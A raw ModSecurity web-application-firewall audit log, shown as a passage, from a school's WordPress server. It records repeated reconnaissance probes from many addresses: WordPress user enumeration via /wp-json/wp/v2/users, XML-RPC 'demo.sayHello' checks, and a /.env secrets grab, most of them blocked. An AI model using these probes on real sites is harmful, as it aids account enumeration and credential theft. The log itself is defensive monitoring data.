156.249.57.166 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3b772252-C-- demo.sayHello --3b772252-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b772252-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746892788824264 5143 (- - -) Stopwatch2: 1746892788824264 5143; combined=4083, p1=520, p2=3339, p3=31, p4=36, p5=93, sr=75, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b772252-Z-- --d91c4017-A-- [10/May/2025:23:07:48 +0700] aB951BLuBiaF9R054QA6rQAAABI 103.236.140.4 60808 103.236.140.4 8181 --d91c4017-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 23.236.181.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 23.236.181.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d91c4017-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d91c4017-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746893268613939 2189 (- - -) Stopwatch2: 1746893268613939 2189; combined=924, p1=328, p2=573, p3=0, p4=0, p5=22, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d91c4017-Z-- --df9a0232-A-- [10/May/2025:23:15:29 +0700] aB97oci6w7GTj2w44Z6C5wAAAMU 103.236.140.4 51600 103.236.140.4 8181 --df9a0232-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --df9a0232-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df9a0232-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746893729332509 2075 (- - -) Stopwatch2: 1746893729332509 2075; combined=1064, p1=347, p2=689, p3=0, p4=0, p5=28, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df9a0232-Z-- --61cf5074-A-- [10/May/2025:23:15:35 +0700] aB97pxLuBiaF9R054QBBuAAAABA 103.236.140.4 51852 103.236.140.4 8181 --61cf5074-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.160.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.160.13 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --61cf5074-C-- demo.sayHello --61cf5074-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --61cf5074-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746893735565164 5064 (- - -) Stopwatch2: 1746893735565164 5064; combined=3603, p1=502, p2=2904, p3=29, p4=30, p5=81, sr=54, sw=57, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61cf5074-Z-- --75406e63-A-- [10/May/2025:23:18:32 +0700] aB98WBLuBiaF9R054QBEaQAAAAg 103.236.140.4 58836 103.236.140.4 8181 --75406e63-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 142.93.41.165 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 142.93.41.165 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --75406e63-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75406e63-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746893912369381 857 (- - -) Stopwatch2: 1746893912369381 857; combined=348, p1=302, p2=0, p3=0, p4=0, p5=46, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75406e63-Z-- --81fd1049-A-- [10/May/2025:23:24:06 +0700] aB99phLuBiaF9R054QBJJgAAAAw 103.236.140.4 44746 103.236.140.4 8181 --81fd1049-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 8.220.202.30 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 8.220.202.30 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --81fd1049-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81fd1049-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746894246964561 3058 (- - -) Stopwatch2: 1746894246964561 3058; combined=1383, p1=438, p2=916, p3=0, p4=0, p5=29, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81fd1049-Z-- --757a5d42-A-- [10/May/2025:23:51:32 +0700] aB-EFNr9PbfRBMhzxmRgxgAAAEE 103.236.140.4 33322 103.236.140.4 8181 --757a5d42-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.81.215.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.81.215.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --757a5d42-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --757a5d42-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746895892124294 2421 (- - -) Stopwatch2: 1746895892124294 2421; combined=950, p1=314, p2=614, p3=0, p4=0, p5=22, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --757a5d42-Z-- --f405d82c-A-- [11/May/2025:00:30:10 +0700] aB-NIsi6w7GTj2w44Z7VAAAAAMk 103.236.140.4 48374 103.236.140.4 8181 --f405d82c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f405d82c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f405d82c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898210267758 2952 (- - -) Stopwatch2: 1746898210267758 2952; combined=1687, p1=525, p2=1133, p3=0, p4=0, p5=29, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f405d82c-Z-- --fadc5003-A-- [11/May/2025:00:30:22 +0700] aB-NLtr9PbfRBMhzxmSJ-QAAAEg 103.236.140.4 48928 103.236.140.4 8181 --fadc5003-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.166.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.166.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fadc5003-C-- demo.sayHello --fadc5003-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fadc5003-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898222344990 6831 (- - -) Stopwatch2: 1746898222344990 6831; combined=5140, p1=645, p2=4183, p3=104, p4=46, p5=99, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fadc5003-Z-- --0a0dc77c-A-- [11/May/2025:00:30:43 +0700] aB-NQ8i6w7GTj2w44Z7V2QAAAMc 103.236.140.4 49856 103.236.140.4 8181 --0a0dc77c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0a0dc77c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a0dc77c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898243157508 2012 (- - -) Stopwatch2: 1746898243157508 2012; combined=1021, p1=335, p2=663, p3=0, p4=0, p5=23, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a0dc77c-Z-- --67e99f37-A-- [11/May/2025:00:30:57 +0700] aB-NUci6w7GTj2w44Z7V-gAAANM 103.236.140.4 50446 103.236.140.4 8181 --67e99f37-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.123 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --67e99f37-C-- demo.sayHello --67e99f37-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --67e99f37-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898257288983 22822 (- - -) Stopwatch2: 1746898257288983 22822; combined=11515, p1=635, p2=10592, p3=42, p4=68, p5=104, sr=75, sw=74, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --67e99f37-Z-- --6e66f45c-A-- [11/May/2025:00:31:14 +0700] aB-NYsi6w7GTj2w44Z7WGwAAAMo 103.236.140.4 51202 103.236.140.4 8181 --6e66f45c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.100 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6e66f45c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e66f45c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898274845132 2195 (- - -) Stopwatch2: 1746898274845132 2195; combined=999, p1=339, p2=638, p3=0, p4=0, p5=22, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e66f45c-Z-- --f6c91445-A-- [11/May/2025:00:31:21 +0700] aB-Nadr9PbfRBMhzxmSLVQAAAEY 103.236.140.4 51518 103.236.140.4 8181 --f6c91445-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.84.100 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.84.100 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f6c91445-C-- demo.sayHello --f6c91445-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6c91445-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898281873756 5499 (- - -) Stopwatch2: 1746898281873756 5499; combined=4183, p1=595, p2=3383, p3=37, p4=49, p5=71, sr=53, sw=48, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6c91445-Z-- --a652736c-A-- [11/May/2025:00:31:41 +0700] aB-NfauC4AqLGUOyzyUYYgAAAIQ 103.236.140.4 52400 103.236.140.4 8181 --a652736c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a652736c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a652736c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898301888159 2583 (- - -) Stopwatch2: 1746898301888159 2583; combined=1284, p1=420, p2=832, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a652736c-Z-- --17d29d0a-A-- [11/May/2025:00:31:47 +0700] aB-Ng9r9PbfRBMhzxmSL6gAAAFc 103.236.140.4 52630 103.236.140.4 8181 --17d29d0a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.103.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.103.229 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --17d29d0a-C-- demo.sayHello --17d29d0a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --17d29d0a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898307277210 5572 (- - -) Stopwatch2: 1746898307277210 5572; combined=4278, p1=491, p2=3496, p3=59, p4=76, p5=95, sr=51, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17d29d0a-Z-- --23a9b515-A-- [11/May/2025:00:32:56 +0700] aB-NyNr9PbfRBMhzxmSNEAAAAEI 103.236.140.4 55112 103.236.140.4 8181 --23a9b515-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.248 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --23a9b515-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23a9b515-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746898376359724 2679 (- - -) Stopwatch2: 1746898376359724 2679; combined=1554, p1=516, p2=1006, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23a9b515-Z-- --1bca851f-A-- [11/May/2025:00:33:02 +0700] aB-Nztr9PbfRBMhzxmSNHQAAAEI 103.236.140.4 55298 103.236.140.4 8181 --1bca851f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.94.248 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.94.248 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1bca851f-C-- demo.sayHello --1bca851f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1bca851f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746898382628605 5793 (- - -) Stopwatch2: 1746898382628605 5793; combined=4738, p1=558, p2=3927, p3=40, p4=49, p5=98, sr=73, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
